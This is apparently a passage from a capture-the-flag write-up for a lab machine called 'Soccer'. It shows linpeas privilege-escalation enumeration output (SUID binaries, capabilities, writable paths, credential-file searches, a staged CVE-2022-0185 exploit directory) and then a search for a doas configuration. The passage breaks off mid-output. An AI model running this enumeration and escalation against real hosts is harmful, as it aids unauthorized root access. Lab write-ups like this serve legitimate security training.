Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)-rwsr-xr-x 1 root root 67K Feb 7 2022 /snap/core20/1695/usr/bin/su-rwsr-xr-x 1 root root 163K Jan 19 2021 /snap/core20/1695/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable-rwsr-xr-x 1 root root 39K Feb 7 2022 /snap/core20/1695/usr/bin/umount ---> BSD/Linux(08-1996)-rwsr-xr-- 1 root systemd-resolve 51K Oct 25 13:09 /snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper-rwsr-xr-x 1 root root 463K Mar 30 2022 /snap/core20/1695/usr/lib/openssh/ssh-keysign╔══════════╣ SGID╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid -rwxr-sr-x 1 root utmp 15K Sep 30 2019 /usr/lib/x86_64-linux-gnu/utempter/utempter -rwxr-sr-x 1 root shadow 31K Nov 29 11:53 /usr/bin/expiry-rwxr-sr-x 1 root crontab 43K Feb 13 2020 /usr/bin/crontab-rwxr-sr-x 1 root tty 15K Mar 30 2020 /usr/bin/bsd-write-rwxr-sr-x 1 root ssh 343K Mar 30 2022 /usr/bin/ssh-agent-rwxr-sr-x 1 root shadow 83K Nov 29 11:53 /usr/bin/chage-rwxr-sr-x 1 root tty 35K Feb 7 2022 /usr/bin/wall-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)-rwxr-sr-x 1 root shadow 43K Sep 17 2021 /usr/sbin/pam_extrausers_chkpwd-rwxr-sr-x 1 root shadow 43K Sep 17 2021 /usr/sbin/unix_chkpwd-rwxr-sr-x 1 root shadow 83K Mar 14 2022 /snap/core20/1695/usr/bin/chage-rwxr-sr-x 1 root shadow 31K Mar 14 2022 /snap/core20/1695/usr/bin/expiry-rwxr-sr-x 1 root crontab 343K Mar 30 2022 /snap/core20/1695/usr/bin/ssh-agent-rwxr-sr-x 1 root tty 35K Feb 7 2022 /snap/core20/1695/usr/bin/wall-rwxr-sr-x 1 root shadow 43K Sep 17 2021 /snap/core20/1695/usr/sbin/pam_extrausers_chkpwd-rwxr-sr-x 1 root shadow 43K Sep 17 2021 /snap/core20/1695/usr/sbin/unix_chkpwd╔══════════╣ Checking misconfigurations of ld.so╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so /etc/ld.so.conf include /etc/ld.so.conf.d/*.conf/etc/ld.so.conf.d /etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf/usr/lib/x86_64-linux-gnu/libfakeroot /etc/ld.so.conf.d/libc.conf/usr/local/lib /etc/ld.so.conf.d/x86_64-linux-gnu.conf/usr/local/lib/x86_64-linux-gnu/lib/x86_64-linux-gnu/usr/lib/x86_64-linux-gnu╔══════════╣ Capabilities╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities Current env capabilities: Current: =Current proc capabilities:CapInh: 0000000000000000CapPrm: 0000000000000000CapEff: 0000000000000000CapBnd: 0000003fffffffffCapAmb: 0000000000000000Parent Shell capabilities:0x0000000000000000=Files with capabilities (limited to 50):/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep/usr/bin/traceroute6.iputils = cap_net_raw+ep/usr/bin/ping = cap_net_raw+ep/usr/bin/mtr-packet = cap_net_raw+ep/snap/core20/1695/usr/bin/ping = cap_net_raw+ep╔══════════╣ Users with capabilities╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities ╔══════════╣ AppArmor binary profiles-rw-r--r-- 1 root root 3461 Jun 21 2022 sbin.dhclient -rw-r--r-- 1 root root 3202 Feb 25 2020 usr.bin.man-rw-r--r-- 1 root root 28486 Nov 28 04:55 usr.lib.snapd.snap-confine.real-rw-r--r-- 1 root root 2006 Oct 19 11:35 usr.sbin.mysqld-rw-r--r-- 1 root root 1575 Feb 11 2020 usr.sbin.rsyslogd-rw-r--r-- 1 root root 1385 Dec 7 2019 usr.sbin.tcpdump╔══════════╣ Files with ACLs (limited to 50)╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls files with acls in searched folders Not Found ╔══════════╣ .sh files in path╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path /usr/bin/rescan-scsi-bus.sh /usr/bin/gettext.sh╔══════════╣ Executable files potentially added by user (limit 70)2022-11-17+09:09:15.5479107120 /usr/local/bin/doasedit 2022-11-17+09:09:15.5439087120 /usr/local/bin/vidoas2022-11-17+09:09:15.5399067120 /usr/local/bin/doas2022-11-15+21:42:19.3514476930 /etc/grub.d/01_track_initrdless_boot_fallback2022-11-15+21:40:43.9906230840 /etc/console-setup/cached_setup_terminal.sh2022-11-15+21:40:43.9906230840 /etc/console-setup/cached_setup_keyboard.sh2022-11-15+21:40:43.9906230840 /etc/console-setup/cached_setup_font.sh╔══════════╣ Unexpected in root/data /vagrant╔══════════╣ Files (scripts) in /etc/profile.d/╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files total 36drwxr-xr-x 2 root root 4096 Dec 1 18:14 .drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..-rw-r--r-- 1 root root 96 Dec 5 2019 01-locale-fix.sh-rw-r--r-- 1 root root 1557 Feb 17 2020 Z97-byobu.sh-rw-r--r-- 1 root root 835 Oct 17 16:25 apps-bin-path.sh-rw-r--r-- 1 root root 729 Feb 2 2020 bash_completion.sh-rw-r--r-- 1 root root 1003 Aug 13 2019 cedilla-portuguese.sh-rw-r--r-- 1 root root 1107 Nov 3 2019 gawk.csh-rw-r--r-- 1 root root 757 Nov 3 2019 gawk.sh╔══════════╣ Permissions in init, init.d, systemd, and rc.d╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d ═╣ Hashes inside passwd file? ........... No═╣ Writable passwd file? ................ No ═╣ Credentials in fstab/mtab? ........... No ═╣ Can I read shadow files? ............. No ═╣ Can I read shadow plists? ............ No ═╣ Can I write shadow plists? ........... No ═╣ Can I read opasswd file? ............. No ═╣ Can I write in network-scripts? ...... No ═╣ Can I read root folder? .............. No╔══════════╣ Searching root files in home dirs (limit 30)/home/ /home/player/.viminfo/home/player/user.txt/home/player/.bash_history/root//var/www/var/www/html/var/www/html/ground1.jpg/var/www/html/ground4.jpg/var/www/html/football.jpg/var/www/html/ground3.jpg/var/www/html/index.html/var/www/html/tiny/var/www/html/tiny/tinyfilemanager.php/var/www/html/tiny/uploads/var/www/html/ground2.jpg╔══════════╣ Searching folders owned by me containing others files on it (limit 100)/home/player /sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/sys/fs/cgroup/unified/user.slice/user-1001.slice/user@1001.service╔══════════╣ Readable files belonging to root and readable by me but not world readable-rw-r----- 1 root player 33 Mar 18 11:05 /home/player/user.txt ╔══════════╣ Modified interesting files in the last 5mins (limit 100)/var/log/auth.log /var/log/syslog/var/log/journal/54adfd95645d49d9a102f16e9e98293b/system.journal/var/log/journal/54adfd95645d49d9a102f16e9e98293b/user-1001.journal╔══════════╣ Writable log files (logrotten) (limit 50)╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation logrotate 3.14.0 Default mail command: /usr/bin/mail Default compress command: /bin/gzip Default uncompress command: /bin/gunzip Default compress extension: .gz Default state file path: /var/lib/logrotate/status ACL support: yes SELinux support: yes╔══════════╣ Files inside /home/player (limit 20)total 860 drwxr-xr-x 7 player player 4096 Mar 19 07:07 .drwxr-xr-x 3 root root 4096 Nov 17 09:25 ..lrwxrwxrwx 1 root root 9 Nov 17 09:02 .bash_history -> /dev/null-rw-r--r-- 1 player player 220 Feb 25 2020 .bash_logout-rw-r--r-- 1 player player 3771 Feb 25 2020 .bashrcdrwx------ 2 player player 4096 Nov 17 09:00 .cachedrwx------ 3 player player 4096 Mar 19 04:05 .configdrwx------ 3 player player 4096 Mar 19 07:08 .gnupg-rw------- 1 player player 36 Mar 19 05:23 .lesshstdrwxrwxr-x 3 player player 4096 Mar 18 18:53 .local-rw-r--r-- 1 player player 807 Feb 25 2020 .profilelrwxrwxrwx 1 root root 9 Nov 17 09:02 .viminfo -> /dev/null-rwxrwxr-x 1 player player 828172 Feb 26 04:31 linpeas.shdrwx------ 3 player player 4096 Mar 19 03:52 snap-rw-r----- 1 root player 33 Mar 18 11:05 user.txt╔══════════╣ Files inside others home (limit 20)/var/www/html/ground1.jpg /var/www/html/ground4.jpg/var/www/html/football.jpg/var/www/html/ground3.jpg/var/www/html/index.html/var/www/html/tiny/tinyfilemanager.php/var/www/html/ground2.jpg╔══════════╣ Searching installed mail applications ╔══════════╣ Mails (limit 50) ╔══════════╣ Backup files (limited 100)-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz -rw-r--r-- 1 root root 392817 Feb 9 2020 /usr/share/doc/manpages/Changes.old.gz-rw-r--r-- 1 root root 11886 Nov 17 09:07 /usr/share/info/dir.old-rw-r--r-- 1 root root 2756 Feb 13 2020 /usr/share/man/man8/vgcfgbackup.8.gz-rwxr-xr-x 1 root root 226 Feb 17 2020 /usr/share/byobu/desktop/byobu.desktop.old-rw-r--r-- 1 root root 44048 Aug 16 2022 /usr/lib/x86_64-linux-gnu/open-vm-tools/plugins/vmsvc/libvmbackup.so-rw-r--r-- 1 root root 1802 Aug 15 2022 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py-rw-r--r-- 1 root root 1413 Nov 15 21:40 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc-rw-r--r-- 1 root root 39448 Nov 15 20:42 /usr/lib/mysql/plugin/component_mysqlbackup.so-rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/class="lazy" data-src/linux-headers-5.4.0-135/tools/testing/selftests/net/tcp_fastopen_backup_key.sh-rw-r--r-- 1 root root 237863 Nov 23 19:51 /usr/class="lazy" data-src/linux-headers-5.4.0-135-generic/.config.old-rw-r--r-- 1 root root 0 Nov 23 19:51 /usr/class="lazy" data-src/linux-headers-5.4.0-135-generic/include/config/net/team/mode/activebackup.h-rw-r--r-- 1 root root 0 Nov 23 19:51 /usr/class="lazy" data-src/linux-headers-5.4.0-135-generic/include/config/wm831x/backup.h╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001 Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20) -> Extracting tables from /var/lib/command-not-found/commands.db (limit 20) -> Extracting tables from /var/lib/fwupd/pending.db (limit 20) ╔══════════╣ Web files?(output limit)/var/www/: total 12Kdrwxr-xr-x 3 root root 4.0K Nov 17 08:06 .drwxr-xr-x 14 root root 4.0K Nov 17 08:06 ..drwxr-xr-x 3 root root 4.0K Nov 17 08:20 html/var/www/html:total 1.1Mdrwxr-xr-x 3 root root 4.0K Nov 17 08:20 .drwxr-xr-x 3 root root 4.0K Nov 17 08:06 ..╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)-rw------- 1 root root 0 Mar 18 11:05 /run/snapd/lock/.lock -rw-r--r-- 1 root root 0 Mar 18 11:05 /run/network/.ifstate.lock-rw-r--r-- 1 root root 121 Nov 3 11:37 /usr/lib/node_modules/npm/node_modules/node-gyp/gyp/.flake8-rw-r--r-- 1 root root 38 Oct 14 2021 /usr/lib/node_modules/npm/node_modules/qrcode-terminal/.travis.yml-rw-r--r-- 1 root root 0 Oct 14 2021 /usr/lib/node_modules/npm/.npmrc-rw-r--r-- 1 root root 119 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/continuation-local-storage/.travis.yml-rw-r--r-- 1 root root 422 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/continuation-local-storage/.eslintrc-rw-r--r-- 1 root root 78 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/dayjs/.editorconfig-rw-r--r-- 1 root root 605 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/resolve/.editorconfig-rw-r--r-- 1 root root 1687 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/resolve/.eslintrc-rw-r--r-- 1 root root 52 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/deep-is/.travis.yml-rw-r--r-- 1 root root 71 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/shimmer/.travis.yml-rw-r--r-- 1 root root 71 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/emitter-listener/.travis.yml-rw-r--r-- 1 root root 63 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/pm2-axon-rpc/.travis.yml-rw-r--r-- 1 root root 144 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/yamljs/.travis.yml-rw-r--r-- 1 root root 207 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/socks/.eslintrc.cjs-rw-r--r-- 1 root root 124 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/socks/.prettierrc.yaml-rw-r--r-- 1 root root 230 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/fclone/.travis.yml-rw-r--r-- 1 root root 139 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/is-core-module/.nycrc-rw-r--r-- 1 root root 339 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/is-core-module/.eslintrc-rw-r--r-- 1 root root 107 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/vizion/.travis.yml-rw-r--r-- 1 root root 63 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/module-details-from-path/.travis.yml-rw-r--r-- 1 root root 33 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/vm2/.eslintignore-rw-r--r-- 1 root root 213 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/vm2/.eslintrc.js-rw-r--r-- 1 root root 242 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/estraverse/.jshintrc-rw-r--r-- 1 root root 152 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/smart-buffer/.travis.yml-rw-r--r-- 1 root root 84 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/smart-buffer/.prettierrc.yaml-rw-r--r-- 1 root root 1168 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/promptly/.jshintrc-rw-r--r-- 1 root root 220 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/promptly/.editorconfig-rw-r--r-- 1 root root 62 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/promptly/.travis.yml-rw-r--r-- 1 root root 2343 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/io/.drone.jsonnet-rw-r--r-- 1 root root 280 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/io/.mocharc.js-rw-r--r-- 1 root root 2095 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/js-api/.drone.jsonnet-rw-r--r-- 1 root root 78 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/agent/node_modules/dayjs/.editorconfig-rw-r--r-- 1 root root 2745 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/agent/.drone.jsonnet-rw-r--r-- 1 root root 244 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/agent/.mocharc.yml-rw-r--r-- 1 root root 219 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/async-listener/.travis.yml-rw-r--r-- 1 root root 139 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/supports-preserve-symlinks-flag/.nycrc-rw-r--r-- 1 root root 132 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/supports-preserve-symlinks-flag/.eslintrc-rw-r--r-- 1 root root 43 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/concat-map/.travis.yml-rw-r--r-- 1 root root 50 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/log-driver/.travis.yml-rw-r--r-- 1 root root 125 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/tx2/.travis.yml-rw-r--r-- 1 root root 286 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/.editorconfig-rw-r--r-- 1 root root 4140 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/.jscs.json-rw-r--r-- 1 root root 5451 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/.travis.yml-rw-r--r-- 1 root root 176 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/test/.eslintrc-rw-r--r-- 1 root root 231 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/.eslintrc-rw-r--r-- 1 root root 357 Nov 17 08:07 /usr/lib/node_modules/pm2/.travis.yml-rw-r--r-- 1 root root 216 Nov 17 08:07 /usr/lib/node_modules/pm2/.mocharc.js-rw-r--r-- 1 landscape landscape 0 Nov 15 21:40 /var/lib/landscape/.cleanup.user-rw------- 1 root root 0 Nov 15 21:38 /etc/.pwd.lock-rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout-rw-r--r-- 1 player player 220 Feb 25 2020 /home/player/.bash_logout-rw------- 1 root root 0 Oct 27 04:34 /snap/core20/1695/etc/.pwd.lock-rw-r--r-- 1 root root 220 Feb 25 2020 /snap/core20/1695/etc/skel/.bash_logout╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)-rwxrwxrwx 1 www-data www-data 700144 Mar 18 11:45 /tmp/exploit -rwxrwxr-x 1 player player 765818 Mar 18 10:45 /tmp/linpeas.sh-rw-rw-r-- 1 player player 166722 Mar 19 04:01 /tmp/peas_result-rw-rw-rw- 1 www-data www-data 2590720 Mar 18 11:44 /tmp/dist.tar-rw-r--r-- 1 www-data www-data 1329 Mar 18 11:42 /tmp/CVE-2022-0185/util.c-rw-r--r-- 1 www-data www-data 7671 Mar 18 11:42 /tmp/CVE-2022-0185/exploit_fuse.c-rw-r--r-- 1 www-data www-data 17624 Mar 18 11:42 /tmp/CVE-2022-0185/exploit_kctf.c-rw-r--r-- 1 www-data www-data 1375 Mar 18 11:42 /tmp/CVE-2022-0185/util.h-rw-r--r-- 1 www-data www-data 1648 Mar 18 11:42 /tmp/CVE-2022-0185/fakefuse.c-rw-r--r-- 1 www-data www-data 67802 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_lowlevel.h-rw-r--r-- 1 www-data www-data 18939 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_kernel.h-rw-r--r-- 1 www-data www-data 45131 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse.h-rw-r--r-- 1 www-data www-data 27245 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_common.h-rw-r--r-- 1 www-data www-data 1968 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_log.h-rw-r--r-- 1 www-data www-data 7549 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_opt.h-rw-r--r-- 1 www-data www-data 178 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/meson.build-rw-r--r-- 1 www-data www-data 2573 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/cuse_lowlevel.h-rw-r--r-- 1 www-data www-data 623 Mar 18 11:42 /tmp/CVE-2022-0185/fakefuse.h-rw-r--r-- 1 www-data www-data 228 Mar 18 11:42 /tmp/CVE-2022-0185/Makefile-rw-r--r-- 1 www-data www-data 1798260 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse3.a-rw-r--r-- 1 www-data www-data 73 Mar 18 11:42 /tmp/CVE-2022-0185/.git/description-rw-r--r-- 1 www-data www-data 23 Mar 18 11:42 /tmp/CVE-2022-0185/.git/HEAD-rw-r--r-- 1 www-data www-data 1482 Mar 18 11:42 /tmp/CVE-2022-0185/.git/index-rw-r--r-- 1 www-data www-data 114 Mar 18 11:42 /tmp/CVE-2022-0185/.git/packed-refs-rw-r--r-- 1 www-data www-data 279 Mar 18 11:42 /tmp/CVE-2022-0185/.git/config-r--r--r-- 1 www-data www-data 510232 Mar 18 11:42 /tmp/CVE-2022-0185/.git/objects/pack/pack-0dab61f937873259ecf5d2eb543ff85605da5af1.pack-r--r--r-- 1 www-data www-data 1716 Mar 18 11:42 /tmp/CVE-2022-0185/.git/objects/pack/pack-0dab61f937873259ecf5d2eb543ff85605da5af1.idx-rw-r--r-- 1 www-data www-data 240 Mar 18 11:42 /tmp/CVE-2022-0185/.git/info/exclude-rw-r--r-- 1 www-data www-data 198 Mar 18 11:42 /tmp/CVE-2022-0185/.git/logs/HEAD-rw-r--r-- 1 www-data www-data 198 Mar 18 11:42 /tmp/CVE-2022-0185/.git/logs/refs/heads/master-rw-r--r-- 1 www-data www-data 198 Mar 18 11:42 /tmp/CVE-2022-0185/.git/logs/refs/remotes/origin/HEAD-rwxr-xr-x 1 www-data www-data 896 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/commit-msg.sample-rwxr-xr-x 1 www-data www-data 4898 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-rebase.sample-rwxr-xr-x 1 www-data www-data 1492 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/prepare-commit-msg.sample-rwxr-xr-x 1 www-data www-data 416 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-merge-commit.sample-rwxr-xr-x 1 www-data www-data 544 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-receive.sample-rwxr-xr-x 1 www-data www-data 4726 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/fsmonitor-watchman.sample-rwxr-xr-x 1 www-data www-data 2783 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/push-to-checkout.sample-rwxr-xr-x 1 www-data www-data 189 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/post-update.sample-rwxr-xr-x 1 www-data www-data 424 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-applypatch.sample-rwxr-xr-x 1 www-data www-data 1643 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-commit.sample-rwxr-xr-x 1 www-data www-data 478 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/applypatch-msg.sample-rwxr-xr-x 1 www-data www-data 1374 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-push.sample-rwxr-xr-x 1 www-data www-data 3650 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/update.sample-rw-r--r-- 1 www-data www-data 41 Mar 18 11:42 /tmp/CVE-2022-0185/.git/refs/heads/master-rw-r--r-- 1 www-data www-data 32 Mar 18 11:42 /tmp/CVE-2022-0185/.git/refs/remotes/origin/HEAD-rw-r--r-- 1 www-data www-data 1241 Mar 18 11:42 /tmp/CVE-2022-0185/README.md-rw-r--r-- 1 root root 4085 Dec 1 19:02 /var/backups/apt.extended_states.1.gz-rw-r--r-- 1 root root 172 Nov 17 08:51 /var/backups/dpkg.statoverride.0-rw-r--r-- 1 root root 682236 Dec 13 07:46 /var/backups/dpkg.status.0-rw-r--r-- 1 root root 268 Nov 15 21:42 /var/backups/dpkg.diversions.0-rw-r--r-- 1 root root 4039 Dec 1 13:33 /var/backups/apt.extended_states.2.gz-rw-r--r-- 1 root root 36981 Dec 13 07:46 /var/backups/apt.extended_states.0-rw-r--r-- 1 root root 61440 Mar 19 06:25 /var/backups/alternatives.tar.0-rw-r--r-- 1 root root 4062 Nov 22 16:36 /var/backups/apt.extended_states.3.gz╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files /dev/mqueue /dev/shm/home/player/run/lock/run/screen/run/user/1001/run/user/1001/dbus-1/run/user/1001/dbus-1/services/run/user/1001/gnupg/run/user/1001/inaccessible/run/user/1001/systemd/run/user/1001/systemd/transient/run/user/1001/systemd/units/snap/core20/1695/run/lock/snap/core20/1695/tmp/snap/core20/1695/var/tmp/tmp/tmp/.ICE-unix/tmp/.Test-unix/tmp/.X11-unix/tmp/.XIM-unix/tmp/.font-unix#)You_can_write_even_more_files_inside_last_directory/var/crash/var/lib/php/sessions/var/tmp/var/tmp/cloud-init/var/www/html/tiny/uploads╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files Group player: /usr/local/share/dstat /tmp/linpeas.sh/tmp/peas_result╔══════════╣ Searching passwords in history files ╔══════════╣ Searching *password* or *credential* files in home (limit 70)/etc/pam.d/common-password /usr/bin/systemd-ask-password/usr/bin/systemd-tty-ask-password-agent/usr/lib/git-core/git-credential/usr/lib/git-core/git-credential-cache/usr/lib/git-core/git-credential-cache--daemon/usr/lib/git-core/git-credential-store #)There are more creds/passwds files in the previous parent folder/usr/lib/grub/i386-pc/password.mod/usr/lib/grub/i386-pc/password_pbkdf2.mod/usr/lib/mysql/plugin/component_validate_password.so/usr/lib/mysql/plugin/validate_password.so/usr/lib/node_modules/pm2/node_modules/enquirer/lib/prompts/password.js/usr/lib/node_modules/pm2/node_modules/proxy-agent/test/ssl-cert-snakeoil.key/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc/usr/lib/python3/dist-packages/keyring/credentials.py/usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc/usr/lib/python3/dist-packages/launchpadlib/credentials.py/usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc/usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc/usr/lib/python3/dist-packages/twisted/cred/credentials.py/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path/usr/lib/systemd/system/systemd-ask-password-console.path/usr/lib/systemd/system/systemd-ask-password-console.service/usr/lib/systemd/system/systemd-ask-password-plymouth.path/usr/lib/systemd/system/systemd-ask-password-plymouth.service #)There are more creds/passwds files in the previous parent folder/usr/share/doc/git/contrib/credential/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c/usr/share/man/man1/git-credential-cache--daemon.1.gz/usr/share/man/man1/git-credential-cache.1.gz/usr/share/man/man1/git-credential-store.1.gz/usr/share/man/man1/git-credential.1.gz #)There are more creds/passwds files in the previous parent folder/usr/share/man/man7/gitcredentials.7.gz╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs ╔══════════╣ Searching passwords inside logs (limit 70)Binary file /var/log/journal/54adfd95645d49d9a102f16e9e98293b/user-1001.journal matches [ 4.757765] systemd[1]: Started Forward Password Requests to Wall Directory Watch.[ 5.271285] systemd[1]: Started Forward Password Requests to Wall Directory Watch. ╔════════════════╗════════════════════════════════╣ API Keys Regex ╠════════════════════════════════ ╚════════════════╝ Regexes to search for API keys aren't activated, use param '-r' player@soccer:~$ 
we try this doas
player@soccer:~$ player@soccer:~$ player@soccer:~$ find / -name "doas.conf"find: ‘/run/udisks2’: Permission deniedfind: ‘/run/user/1001/inaccessible’: Permission deniedfind: ‘/run/sudo’: Permission deniedfind: ‘/run/cryptsetup’: Permission deniedfind: ‘/run/multipath’: Permission deniedfind: ‘/run/lvm’: Permission deniedfind: ‘/run/systemd/unit-root’: Permission deniedfind: ‘/run/systemd/inaccessible’: Permission deniedfind: ‘/run/lock/lvm’: Permission deniedfind: ‘/run/initramfs’: Permission denied/usr/local/etc/doas.conffind: ‘/sys/kernel/tracing’: Permission deniedfind: ‘/sys/kernel/debug’: Permission deniedfind: ‘/sys/fs/pstore’: Permission deniedfind: ‘/sys/fs/bpf’: Permission deniedfind: ‘/var/spool/rsyslog’: Permission deniedfind: ‘/var/spool/cron/atjobs’: Permission deniedfind: ‘/var/spool/cron/atspool’: Permission deniedfind: ‘/var/spool/cron/crontabs’: Permission deniedfind: ‘/var/lib/update-notifier/package-data-downloads/partial’: Permission deniedfind: ‘/var/lib/snapd/void’: Permission deniedfind: ‘/var/lib/snapd/cookie’: Permission deniedfind: ‘/var/lib/polkit-1’: Permission deniedfind: ‘/var/lib/apt/lists/partial’: Permission deniedfind: ‘/var/lib/php/sessions’: Permission deniedfind: ‘/var/lib/mysql’: Permission deniedfind: ‘/var/lib/private’: Permission deniedfind: ‘/var/lib/AccountsService/users’: Permission deniedfind: ‘/var/lib/nginx/proxy’: Permission deniedfind: ‘/var/lib/nginx/scgi’: Permission deniedfind: ‘/var/lib/nginx/fastcgi’: Permission deniedfind: 